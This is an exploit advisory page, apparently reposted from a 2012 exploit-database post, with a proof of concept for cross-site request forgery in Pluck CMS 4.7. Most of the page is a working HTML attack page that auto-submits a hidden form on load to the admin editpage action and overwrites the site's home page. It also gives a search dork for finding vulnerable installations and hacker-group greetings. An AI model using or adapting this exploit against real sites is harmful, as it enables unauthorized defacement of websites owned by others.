Pluck 4.7 Cross Site Request Forgery

2012.04.05
Credit: DoSs-Dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 +---------------------------------------+ 1 0 |I'm DoSs-Dz member from Inj3ct0r Team | 1 1 +---------------------------------------+ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 +----------------------------------------------------------------------------+ # Exploit Title : pluck 4.7 CSRF edit home page # Date : 04 April 2012 # Site for Vendor : http://www.pluck-cms.org/downloads/pluck-4_7.tar.gz # Dork : powered by pluck # Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS" +----------------------------------------------------------------------------+ [!1?] Exploit P0C =? <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> Edit html page for home page by : DoSs-Dz </title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "95","119","253","79","89" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);} function fireForms(){ var count = 5;var i=0; for(i=0; i<count; i++) {document.forms[i].submit(); pausecomp(pauses[i]);}} </script> <H2> Edit html page for home page by : DoSs-Dz </H2> <form method="POST" name="form0" action="http://127.0.0.1:80/xampp/1/admin.php?action=editpage"> <input type="hidden" name="title" value="Hack ing Test"/> < ---- EDit Here <input type="hidden" name="content" value="<p>Hiiiii Geysss</p>"/> < ---- EDit Here <input type="hidden" name="description" value=""/> <input type="hidden" name="keywords" value=""/> <input type="hidden" name="hidden" value="no"/> <input type="hidden" name="sub_page" value=""/> <input type="hidden" name="theme" value="default"/> <input type="hidden" name="save" value="Save"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------+ |[?] Greetz to =? [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ] | |[?] Greetz to =? [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ] | +--------------------------------------------------------------------------------------------------------+ +------------------------------------+ |./ Gharrdaia on : 04 april 2012 | +------------------------------------+

References:

http://www.pluck-cms.org/downloads/pluck-4_7.tar.gz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top